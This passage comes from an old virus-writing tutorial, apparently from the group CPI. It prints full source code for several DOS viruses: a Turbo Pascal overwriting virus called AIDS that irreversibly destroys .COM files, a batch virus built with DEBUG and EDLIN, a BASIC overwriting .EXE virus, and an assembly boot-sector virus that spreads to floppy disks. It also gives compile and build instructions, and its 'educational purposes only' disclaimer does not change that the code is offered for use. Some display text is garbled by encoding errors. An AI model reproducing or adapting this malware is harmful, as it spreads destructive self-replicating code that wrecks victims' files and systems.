a nice screen with lots of smiles, with a note telling the operator that their
|
||
system is now screwed, I mean permanantly. The files encrypted containing AIDS
|
||
in their code are IRREVERSIBLY messed up. Oh well...
|
||
|
||
Again, neither CPI nor the author of Number One or AIDS endorses this document
|
||
and program for use in any illegal manner. Also, CPI, the author to Number One
|
||
and AIDS is not responsible for any actions by the readers that may prove harm
|
||
in any way or another. This package was written for EDUCATIONAL purposes only!
|
||
|
||
{ Beginning of source code, Turbo Pascal 3.01a }
|
||
{C-}
|
||
{U-}
|
||
{I-} { Wont allow a user break, enable IO check }
|
||
|
||
{ -- Constants --------------------------------------- }
|
||
|
||
Const
|
||
VirusSize = 13847; { AIDS's code size }
|
||
|
||
Warning :String[42] { Warning message }
|
||
= 'This File Has Been Infected By AIDS! HaHa!';
|
||
|
||
{ -- Type declarations------------------------------------- }
|
||
|
||
Type
|
||
DTARec =Record { Data area for file search }
|
||
DOSnext :Array[1..21] of Byte;
|
||
Attr : Byte;
|
||
Ftime,
|
||
FDate,
|
||
FLsize,
|
||
FHsize : Integer;
|
||
FullName: Array[1..13] of Char;
|
||
End;
|
||
|
||
Registers = Record {Register set used for file search }
|
||
Case Byte of
|
||
1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : Integer);
|
||
2 : (AL,AH,BL,BH,CL,CH,DL,DH : Byte);
|
||
End;
|
||
|
||
{ -- Variables--------------------------------------------- }
|
||
|
||
Var
|
||
{ Memory offset program code }
|
||
ProgramStart : Byte absolute Cseg:$100;
|
||
{ Infected marker }
|
||
MarkInfected : String[42] absolute Cseg:$180;
|
||
Reg : Registers; { Register set }
|
||
DTA : DTARec; { Data area }
|
||
Buffer : Array[Byte] of Byte; { Data buffer }
|
||
TestID : String[42]; { To recognize infected files }
|
||
UsePath : String[66]; { Path to search files }
|
||
{ Lenght of search path }
|
||
UsePathLenght: Byte absolute UsePath;
|
||
Go : File; { File to infect }
|
||
B : Byte; { Used }
|
||
LoopVar : Integer; {Will loop forever}
|
||
|
||
{ -- Program code------------------------------------------ }
|
||
|
||
Begin
|
||
GetDir(0, UsePath); { get current directory }
|
||
if Pos('\', UsePath) <> UsePathLenght then
|
||
UsePath := UsePath + '\';
|
||
UsePath := UsePath + '*.COM'; { Define search mask }
|
||
Reg.AH := $1A; { Set data area }
|
||
Reg.DS := Seg(DTA);
|
||
Reg.DX := Ofs(DTA);
|
||
MsDos(Reg);
|
||
UsePath[Succ(UsePathLenght)]:=#0; { Path must end with #0 }
|
||
Reg.AH := $4E;
|
||
Reg.DS := Seg(UsePath);
|
||
Reg.DX := Ofs(UsePath[1]);
|
||
Reg.CX := $ff; { Set attribute to find ALL files }
|
||
MsDos(Reg); { Find first matching entry }
|
||
IF not Odd(Reg.Flags) Then { If a file found then }
|
||
Repeat
|
||
UsePath := DTA.FullName;
|
||
B := Pos(#0, UsePath);
|
||
If B > 0 then
|
||
Delete(UsePath, B, 255); { Remove garbage }
|
||
Assign(Go, UsePath);
|
||
Reset(Go);
|
||
If IOresult = 0 Then { If not IO error then }
|
||
Begin
|
||
BlockRead(Go, Buffer, 2);
|
||
Move(Buffer[$80], TestID, 43);
|
||
{ Test if file already ill(Infected) }
|
||
If TestID <> Warning Then { If not then ... }
|
||
Begin
|
||
Seek (Go, 0);
|
||
{ Mark file as infected and .. }
|
||
MarkInfected := Warning;
|
||
{ Infect it }
|
||
BlockWrite(Go,ProgramStart,Succ(VirusSize shr 7));
|
||
Close(Go);
|
||
Halt; {.. and halt the program }
|
||
End;
|
||
Close(Go);
|
||
End;
|
||
{ The file has already been infected, search next. }
|
||
Reg.AH := $4F;
|
||
Reg.DS := Seg(DTA);
|
||
Reg.DX := Ofs(DTA);
|
||
MsDos(Reg);
|
||
{ ......................Until no more files are found }
|
||
Until Odd(Reg.Flags);
|
||
Loopvar:=Random(10);
|
||
If Loopvar=7 then
|
||
begin
|
||
Writeln(''); {Give a lot of smiles}
|
||
Writeln('');
|
||
Writeln(' ');
|
||
Writeln(' ATTENTION: ');
|
||
Writeln(' I have been elected to inform you that throughout your process of ');
|
||
Writeln(' collecting and executing files, you have accidentally H<><48>K<EFBFBD> ');
|
||
Writeln(' yourself over; again, that''s PHUCKED yourself over. No, it cannot ');
|
||
Writeln(' be; YES, it CAN be, a <20><><EFBFBD><EFBFBD>s has infected your system. Now what do ');
|
||
Writeln(' you have to say about that? HAHAHAHA. Have H<><48> with this one and ');
|
||
Writeln(' remember, there is NO cure for ');
|
||
Writeln(' ');
|
||
Writeln(' <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ');
|
||
Writeln(' <20><>۱<EFBFBD><DBB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>۱<EFBFBD><DBB1><EFBFBD><EFBFBD><EFBFBD> <20>۱<EFBFBD><DBB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><>۱<EFBFBD><DBB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ');
|
||
Writeln(' <20>۱<EFBFBD> <20>۱ <20>۱ <20>۱ <20>۱ <20>۱<EFBFBD> <20><> ');
|
||
Writeln(' <20>۱ <20>۱ <20>۱ <20>۱ <20>۱ <20>۱ ');
|
||
Writeln(' <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۱ <20>۱ <20>۱ <20>۱ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ');
|
||
Writeln(' <20>۱<EFBFBD><DBB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۱ <20>۱ <20>۱ <20>۱ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۱ ');
|
||
Writeln(' <20>۱ <20>۱ <20>۱ <20>۱ <20>۱ <20>۱ ');
|
||
Writeln(' <20>۱ <20>۱ <20>۱ <20>۱ <20><>۱ <20><> <20><>۱ ');
|
||
Writeln(' <20>۱ <20>۱ <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۱<EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>۱<EFBFBD> ');
|
||
Writeln(' <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ');
|
||
Writeln(' ');
|
||
Writeln(' ');
|
||
REPEAT
|
||
LOOPVAR:=0;
|
||
UNTIL LOOPVAR=1;
|
||
end;
|
||
End.
|
||
|
||
{ Although this is a primitive virus its effective. }
|
||
{ In this virus only the .COM }
|
||
{ files are infected. Its about 13K and it will }
|
||
{ change the date entry. }
|
||
[2.7]
|
||
|
||
Batch Viruses
|
||
-------------
|
||
|
||
|
||
Whoever thought that viruses could be in BATCH file.This virus which we
|
||
|
||
are about to see makes use of MS-DOS operating system. This BATCH virus
|
||
uses DEBUG & EDLIN programs.
|
||
|
||
Name: VR.BAT
|
||
|
||
echo = off ( Self explanatory)
|
||
ctty nul ( This is important. Console output is turned off)
|
||
path c:\msdos ( May differ on other systems )
|
||
dir *.com/w>ind ( The directory is written on "ind" ONLY name entries)
|
||
|
||
edlin ind<1 ( "Ind" is processed with EDLIN so only file names appear)
|
||
debug ind<2 ( New batch program is created with debug)
|
||
edlin name.bat<3 ( This batch goes to an executable form because of EDLIN)
|
||
ctty con ( Console interface is again assigned)
|
||
name ( Newly created NAME.BAT is called.
|
||
|
||
|
||
In addition to file to this Batch file,there command files,here named 1,2,3
|
||
|
||
Here is the first command file:
|
||
-------------------------------
|
||
Name: 1
|
||
|
||
1,4d ( Here line 1-4 of the "IND" file are deleted )
|
||
e ( Save file )
|
||
|
||
Here is the second command file:
|
||
--------------------------------
|
||
Name: 2
|
||
|
||
m100,10b,f000 (First program name is moved to the F000H address to save)
|
||
|
||
e108 ".BAT" (Extention of file name is changed to .BAT)
|
||
m100,10b,f010 (File is saved again)
|
||
e100"DEL " (DEL command is written to address 100H)
|
||
mf000,f00b,104 (Original file is written after this command)
|
||
e10c 2e (Period is placed in from of extension)
|
||
e110 0d,0a (Carrige return+ line feed)
|
||
mf010,f020,11f ( Modified file is moved to 11FH address from buffer area)
|
||
e112 "COPY \VR.BAT" ( COPY command is now placed in front of file)
|
||
e12b od,0a (COPY command terminated with carriage return + lf)
|
||
rxc ( The CX register is ... )
|
||
2c ( set to 2CH)
|
||
nname.bat ( Name it NAME.BAT)
|
||
w ( Write )
|
||
q ( quit )
|
||
|
||
|
||
The third command file must be printed as a hex dump because it contains
|
||
2 control characters (1Ah=Control Z) and this is not entirely printable.
|
||
|
||
Hex dump of the third command file:
|
||
-----------------------------------
|
||
Name: 3
|
||
|
||
0100 31 2C 31 3F 52 20 1A 0D-6E 79 79 79 79 79 79 79
|
||
1 , 1 ? . . n y y y y y y y
|
||
0110 79 29 0D 32 2C 32 3F 52-20 1A OD 6E 6E 79 79 79
|
||
y . 2 , ? ? r . . n n y y y
|
||
0120 79 79 79 79 29 0D 45 0D-00 00 00 00 00 00 00 00
|
||
y y y y . E . . . . . . . . .
|
||
|
||
|
||
In order for this virus to work VR.BAT should be in the root. This program
|
||
only affects .COM files.
|
||
[2.8]
|
||
|
||
Viruses in Basic
|
||
----------------
|
||
|
||
|
||
Basic is great language and often people think of it as a limited language
|
||
and will not be of any use in creating something like a virus. Well you are
|
||
really wrong. Lets take a look at a Basic Virus created by R. Burger in 1987.
|
||
This program is an overwritting virus and uses (Shell) MS-DOS to infect .EXE
|
||
files.To do this you must compile the source code using a the Microsoft
|
||
Quick-BASIC.Note the lenght of the compiled and the linked .EXE file and edit
|
||
the source code to place the lenght of the object program in the LENGHTVIR
|
||
variable. BV3.EXE should be in the current directory, COMMAND.COM must be
|
||
available, the LENGHTVIR variable must be set to the lenght of the linked
|
||
|
||
program and remember to use /e parameter when compiling.
|
||
|
||
|
||
|
||
10 REM ** DEMO
|
||
20 REM ** MODIFY IT YOUR OWN WAY IF DESIRED **
|
||
30 REM ** BASIC DOESNT SUCK
|
||
40 REM ** NO KIDDING
|
||
50 ON ERROR GOTO 670
|
||
60 REM *** LENGHTVIR MUST BE SET **
|
||
70 REM *** TO THE LENGHT TO THE **
|
||
80 REM *** LINKED PROGRAM ***
|
||
90 LENGHTVIR=2641
|
||
100 VIRROOT$="BV3.EXE"
|
||
110 REM *** WRITE THE DIRECTORY IN THE FILE "INH"
|
||
130 SHELL "DIR *.EXE>INH"
|
||
140 REM ** OPEN "INH" FILE AND READ NAMES **
|
||
150 OPEN "R",1,"INH",32000
|
||
160 GET #1,1
|
||
170 LINE INPUT#1,ORIGINAL$
|
||
180 LINE INPUT#1,ORIGINAL$
|
||
190 LINE INPUT#1,ORIGINAL$
|
||
200 LINE INPUT#1,ORIGINAL$
|
||
210 ON ERROR GOT 670
|
||
220 CLOSE#2
|
||
230 F=1:LINE INPUT#1,ORIGINAL$
|
||
240 REM ** "%" IS THE MARKER OF THE BV3
|
||
250 REM ** "%" IN THE NAME MEANS
|
||
260 REM ** INFECTED COPY PRESENT
|
||
270 IF MID$(ORIGINAL$,1,1)="%" THEN GOTO 210
|
||
280 ORIGINAL$=MID$(ORIGINAL$,1,13)
|
||
290 EXTENSIONS$=MID$(ORIGINAL,9,13)
|
||
300 MID$(EXTENSIONS$,1,1)="."
|
||
310 REM *** CONCATENATE NAMES INTO FILENAMES **
|
||
320 F=F+1
|
||
330 IF MID$(ORIGINAL$,F,1)=" " OR MID$ (ORIGINAL$,F,1)="." OR F=13 THEN
|
||
GOTO 350
|
||
340 GOTO 320
|
||
350 ORIGINAL$=MID$(ORIGINAL$,1,F-1)+EXTENSION$
|
||
360 ON ERROR GOTO 210
|
||
365 TEST$=""
|
||
370 REM ++ OPEN FILE FOUND +++
|
||
380 OPEN "R",2,OROGINAL$,LENGHTVIR
|
||
390 IF LOF(2) < LENGHTVIR THEN GOTO 420
|
||
400 GET #2,2
|
||
410 LINE INPUT#1,TEST$
|
||
420 CLOSE#2
|
||
431 REM ++ CHECK IF PROGRAM IS ILL ++
|
||
440 REM ++ "%" AT THE END OF THE FILE MEANS..
|
||
450 REM ++ FILE IS ALREADY SICK ++
|
||
460 REM IF MID$(TEST,2,1)="%" THEN GOTO 210
|
||
470 CLOSE#1
|
||
480 ORIGINALS$=ORIGINAL$
|
||
490 MID$(ORIGINALS$,1,1)="%"
|
||
499 REM ++++ SANE "HEALTHY" PROGRAM ++++
|
||
510 C$="COPY "+ORIGINAL$+" "+ORIGINALS$
|
||
520 SHELL C$
|
||
530 REM *** COPY VIRUS TO HEALTHY PROGRAM ****
|
||
540 C$="COPY "+VIRROOT$+ORIGINAL$
|
||
550 SHELL C$
|
||
560 REM *** APPEND VIRUS MARKER ***
|
||
570 OPEN ORIGINAL$ FOR APPEND AS #1 LEN=13
|
||
580 WRITE#1,ORIGINALS$
|
||
590 CLOSE#1
|
||
630 REM ++ OUYPUT MESSAGE ++
|
||
640 PRINT "INFECTION IN " ;ORIGIANAL$; " !! BE WARE !!"
|
||
650 SYSTEM
|
||
660 REM ** VIRUS ERROR MESSAGE
|
||
670 PRINT "VIRUS INTERNAL ERROR GOTTCHA !!!!":SYSTEM
|
||
680 END
|
||
|
||
|
||
This basic virus will only attack .EXE files. After the execution you will
|
||
see a "INH" file which contains the directory, and the file %SORT.EXE.
|
||
Programs which start with "%" are NOT infected ,they pose as back up copies.
|
||
;[2.9]
|
||
;-----------------------------------------------------------------------;
|
||
; This virus is of the "FLOPPY ONLY" variety. ;
|
||
; It replicates to the boot sector of a floppy disk and when it gains control
|
||
; it will move itself to upper memory. It redirects the keyboard ;
|
||
; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ;
|
||
; it will attempt to infect any floppy it finds in drive A:. ;
|
||
; It keeps the real boot sector at track 39, sector 8, head 0 ;
|
||
; It does not map this sector bad in the fat (unlike the Pakistani Brain)
|
||
; and should that area be used by a file, the virus ;
|
||
; will die. It also contains no anti detection mechanisms as does the ;
|
||
; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ;
|
||
; sector 9 because this is common to all floppy formats both single ;
|
||
; sided and double sided. It does not contain any malevolent TROJAN ;
|
||
; HORSE code. It does appear to contain a count of how many times it ;
|
||
; has infected other diskettes although this is harmless and the count ;
|
||
; is never accessed. ;
|
||
; ;
|
||
; Things to note about this virus: ;
|
||
; It can not only live through an ALT-CTRL-DEL reboot command, but this ;
|
||
; is its primary (only for that matter) means of reproduction to other ;
|
||
; floppy diskettes. The only way to remove it from an infected system ;
|
||
; is to turn the machine off and reboot an uninfected copy of DOS. ;
|
||
; It is even resident when no floppy is booted but BASIC is loaded ;
|
||
; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ;
|
||
; it activates and infectes the floppy from which the user is ;
|
||
; attempting to boot. ;
|
||
; ;
|
||
; Also note that because of the POP CS command to pass control to ;
|
||
; its self in upper memory, this virus does not to work on 80286 ;
|
||
; machines (because this is not a valid 80286 instruction). ;
|
||
; ;
|
||
; If your assembler will not allow the POP CS command to execute, replace;
|
||
; the POP CS command with an NOP and then assemble it, then debug that ;
|
||
; part of the code and place POP CS in place of NOP at that section. ;
|
||
; ;
|
||
; The Norton Utilities can be used to identify infected diskettes by ;
|
||
; looking at the boot sector and the DOS SYS utility can be used to ;
|
||
; remove it (unlike the Pakistani Brain). ;
|
||
;-----------------------------------------------------------------------;
|
||
;
|
||
ORG 7C00H ;
|
||
;
|
||
TOS LABEL WORD ;TOP OF STACK
|
||
;-----------------------------------------------------------------------;
|
||
; 1. Find top of memory and copy ourself up there. (keeping same offset);
|
||
; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;
|
||
; 3. Redirect int 9 (keyboard) to ourself in top of memory ;
|
||
; 4. Jump to ourself at top of memory ;
|
||
; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ;
|
||
;-----------------------------------------------------------------------;
|
||
BEGIN: CLI ;INITIALIZE STACK
|
||
XOR AX,AX ;
|
||
MOV SS,AX ;
|
||
MOV SP,offset TOS ;
|
||
STI ;
|
||
;
|
||
MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512)
|
||
MOV DS,BX ;
|
||
MOV AX,[0013H] ;
|
||
MUL BX ;
|
||
SUB AX,07E0H ; (7C00H+512)/16
|
||
MOV ES,AX ;
|
||
;
|
||
PUSH CS ;DS = CS
|
||
POP DS ;
|
||
;
|
||
CMP DI,3456H ;IF THE VIRUS IS REBOOTING...
|
||
JNE B_10 ;
|
||
DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--
|
||
;
|
||
B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY
|
||
MOV DI,SI ;
|
||
MOV CX,512 ;
|
||
CLD ;
|
||
REP MOVSB ;
|
||
;
|
||
MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO
|
||
MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE
|
||
MOV CX,128 ;
|
||
REP MOVSB ;
|
||
;
|
||
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
|
||
;
|
||
PUSH ES ;ES=HI ; JUMP TO OUR HI CODE WITH
|
||
POP CS
|
||
;
|
||
PUSH DS ;DS=0 ; ES = DS
|
||
POP ES ;
|
||
;
|
||
MOV BX,SP ; SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00
|
||
MOV DX,CX ;CX=0 ;DRIVE A: HEAD 0
|
||
MOV CX,2708H ; TRACK 40, SECTOR 8
|
||
MOV AX,0201H ; READ SECTOR
|
||
INT 13H ; (common to 8/9 sect. 1/2 sided!)
|
||
JB $ ; HANG IF ERROR
|
||
;
|
||
JMP JMP_BOOT ;JMP 0000:7C00
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; SAVE THEN REDIRECT INT 9 VECTOR ;
|
||
; ;
|
||
; ON ENTRY: DS = 0 ;
|
||
; ES = WHERE TO SAVE OLD_09 & (HI) ;
|
||
; WHERE NEW_09 IS (HI) ;
|
||
;-----------------------------------------------------------------------;
|
||
PUT_NEW_09: ;
|
||
DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024
|
||
;
|
||
MOV SI,9*4 ;COPY INT 9 VECTOR TO
|
||
MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!)
|
||
MOV CX,0004 ;
|
||
;
|
||
CLI ;
|
||
REP MOVSB ;
|
||
MOV Word Ptr [9*4],offset NEW_09
|
||
MOV [(9*4)+2],ES ;
|
||
STI ;
|
||
;
|
||
RET ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ;
|
||
;-----------------------------------------------------------------------;
|
||
ACK_KEYBD: ;
|
||
IN AL,61H ;RESET KEYBOARD THEN CONTINUE
|
||
MOV AH,AL ;
|
||
OR AL,80H ;
|
||
OUT 61H,AL ;
|
||
XCHG AL,AH ;
|
||
OUT 61H,AL ;
|
||
JMP RBOOT ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; DATA AREA WHICH IS NOT USED IN THIS VERSION ;
|
||
; REASON UNKNOWN ;
|
||
;-----------------------------------------------------------------------;
|
||
TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39
|
||
DB 27H,0,2,2 ; (CURRENTLY NOT USED)
|
||
DB 27H,0,3,2 ;
|
||
DB 27H,0,4,2 ;
|
||
DB 27H,0,5,2 ;
|
||
DB 27H,0,6,2 ;
|
||
DB 27H,0,7,2 ;
|
||
DB 27H,0,8,2 ;
|
||
;
|
||
;A7C9A LABEL BYTE ;
|
||
DW 00024H ;NOT USED
|
||
DB 0ADH ;
|
||
DB 07CH ;
|
||
DB 0A3H ;
|
||
DW 00026H ;
|
||
;
|
||
;L7CA1: ;
|
||
POP CX ;NOT USED
|
||
POP DI ;
|
||
POP SI ;
|
||
POP ES ;
|
||
POP DS ;
|
||
POP AX ;
|
||
POPF ;
|
||
JMP 1111:1111 ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; IF ALT & CTRL & DEL THEN ... ;
|
||
; IF ALT & CTRL & ? THEN ... ;
|
||
;-----------------------------------------------------------------------;
|
||
NEW_09: PUSHF ;
|
||
STI ;
|
||
;
|
||
PUSH AX ;
|
||
PUSH BX ;
|
||
PUSH DS ;
|
||
;
|
||
PUSH CS ;DS=CS
|
||
POP DS ;
|
||
;
|
||
MOV BX,[ALT_CTRL W] ;BX=SCAN CODE LAST TIME
|
||
IN AL,60H ;GET SCAN CODE
|
||
MOV AH,AL ;SAVE IN AH
|
||
AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH
|
||
;
|
||
CMP AL,1DH ;IS IT A [CTRL]...
|
||
JNE N09_10 ;...JUMP IF NO
|
||
MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)
|
||
JMP N09_30 ;
|
||
;
|
||
N09_10: CMP AL,38H ;IS IT AN [ALT]...
|
||
JNE N09_20 ;...JUMP IF NO
|
||
MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)
|
||
JMP N09_30 ;
|
||
;
|
||
N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)...
|
||
JNE N09_30 ;...JUMP IF NO
|
||
;
|
||
CMP AL,17H ;IF [I]...
|
||
JE N09_X0 ;...JUMP IF YES
|
||
CMP AL,53H ;IF [DEL]...
|
||
JE ACK_KEYBD ;...JUMP IF YES
|
||
;
|
||
N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME
|
||
;
|
||
N09_90: POP DS ;
|
||
POP BX ;
|
||
POP AX ;
|
||
POPF ;
|
||
;
|
||
DB 0EAH ;JMP F000:E987
|
||
OLD_09 DW ? ;
|
||
DW 0F000H ;
|
||
;
|
||
N09_X0: JMP N09_X1 ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; ;
|
||
;-----------------------------------------------------------------------;
|
||
RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?
|
||
MOV AX,0800H ;AL=0, AH=DELAY ARG
|
||
OUT DX,AL ;
|
||
CALL DELAY ;
|
||
MOV [ALT_CTRL],AX ;AX=0 ;
|
||
;
|
||
MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR
|
||
INT 10H ;
|
||
MOV AH,2 ;SET CURSOR POS 0,0
|
||
XOR DX,DX ;
|
||
MOV BH,DH ; PAGE 0
|
||
INT 10H ;
|
||
;
|
||
MOV AH,1 ;SET CURSOR TYPE
|
||
MOV CX,0607H ;
|
||
INT 10H ;
|
||
;
|
||
MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)
|
||
CALL DELAY ;
|
||
;
|
||
CLI ;
|
||
OUT 20H,AL ;SEND EOI TO INT CONTROLLER
|
||
;
|
||
MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS
|
||
MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!)
|
||
MOV SI,offset BEGIN - 128 ;
|
||
MOV CX,128 ;
|
||
CLD ;
|
||
REP MOVSB ;
|
||
;
|
||
MOV DS,CX ;CX=0 ;DS=0
|
||
;
|
||
MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR
|
||
MOV [(19H*4)+2],CS ;
|
||
;
|
||
MOV AX,0040H ;DS = ROM DATA AREA
|
||
MOV DS,AX ;
|
||
;
|
||
MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0
|
||
INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)
|
||
;
|
||
PUSH DS ;IF BIOS F000:E502 == 21E4...
|
||
MOV AX,0F000H ;
|
||
MOV DS,AX ;
|
||
CMP Word Ptr [0E502H],21E4H ;
|
||
POP DS ;
|
||
JE R_90 ;
|
||
INT 19H ; IF NOT...REBOOT
|
||
;
|
||
R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; REBOOT INT VECTOR ;
|
||
;-----------------------------------------------------------------------;
|
||
NEW_19: XOR AX,AX ;
|
||
;
|
||
MOV DS,AX ;DS=0
|
||
MOV AX,[0410] ;AX=EQUIP FLAG
|
||
TEST AL,1 ;IF FLOPPY DRIVES ...
|
||
JNZ N19_20 ;...JUMP
|
||
N19_10: PUSH CS ;ELSE ES=CS
|
||
POP ES ;
|
||
CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
|
||
INT 18H ;LOAD BASIC
|
||
;
|
||
N19_20: MOV CX,0004 ;RETRY COUNT = 4
|
||
;
|
||
N19_22: PUSH CX ;
|
||
MOV AH,00 ;RESET DISK
|
||
INT 13 ;
|
||
JB N19_81 ;
|
||
MOV AX,0201 ;READ BOOT SECTOR
|
||
PUSH DS ;
|
||
POP ES ;
|
||
MOV BX,offset BEGIN ;
|
||
MOV CX,1 ;TRACK 0, SECTOR 1
|
||
INT 13H ;
|
||
N19_81: POP CX ;
|
||
JNB N19_90 ;
|
||
LOOP N19_22 ;
|
||
JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; Reinfection segment. ;
|
||
;-----------------------------------------------------------------------;
|
||
N19_90: CMP DI,3456 ;IF NOT FLAG SET...
|
||
JNZ RE_INFECT ;...RE INFECT
|
||
;
|
||
JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR
|
||
JMP 0000:7C00H ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; Reinfection Segment. ;
|
||
;-----------------------------------------------------------------------;
|
||
RE_INFECT: ;
|
||
MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH
|
||
MOV CX,00E6H ; OURSELF
|
||
MOV DI,SI ;
|
||
PUSH CS ;
|
||
POP ES ;
|
||
CLD ;
|
||
REPE CMPSB ;
|
||
JE RI_12 ;IF NOT EQUAL...
|
||
;
|
||
INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)
|
||
;
|
||
;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;
|
||
MOV BX,offset TABLE ;FORMAT INFO
|
||
MOV DX,0000 ;DRIVE A: HEAD 0
|
||
MOV CH,40-1 ;TRACK 39
|
||
MOV AH,5 ;FORMAT
|
||
JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !
|
||
;
|
||
; <<< NO EXECUTION PATH TO HERE >>> ;
|
||
JB RI_80 ;
|
||
;
|
||
;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0
|
||
RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0
|
||
MOV BX,offset BEGIN ;TRACK 40H
|
||
MOV CL,8 ;SECTOR 8
|
||
MOV AX,0301H ;WRITE 1 SECTOR
|
||
INT 13H ;
|
||
;
|
||
PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)
|
||
POP ES ;
|
||
JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE
|
||
;
|
||
MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !
|
||
MOV AX,0301 ;
|
||
INT 13H ;
|
||
JB RI_80 ; IF ERROR...JUMP TO BOOT CODE
|
||
;
|
||
RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"...
|
||
INT 19H ;...FLAG AND REBOOT
|
||
;
|
||
RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)
|
||
DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)
|
||
JMP JMP_BOOT ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; ;
|
||
;-----------------------------------------------------------------------;
|
||
N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS
|
||
;
|
||
MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG
|
||
MOV BX,0040H ;
|
||
MOV DS,BX ;
|
||
MOV [0072H],AX ; 0040:0072 = RESET FLAG
|
||
JMP N09_90 ;
|
||
;
|
||
;-----------------------------------------------------------------------;
|
||
; DELAY ;
|
||
; ;
|
||
; ON ENTRY AH:CX = LOOP COUNT ;
|
||
;-----------------------------------------------------------------------;
|
||
DELAY: SUB CX,CX ;
|
||
D_01: LOOP $ ;
|
||
SUB AH,1 ;
|
||
JNZ D_01 ;
|
||
RET ;
|
||
;
|
||
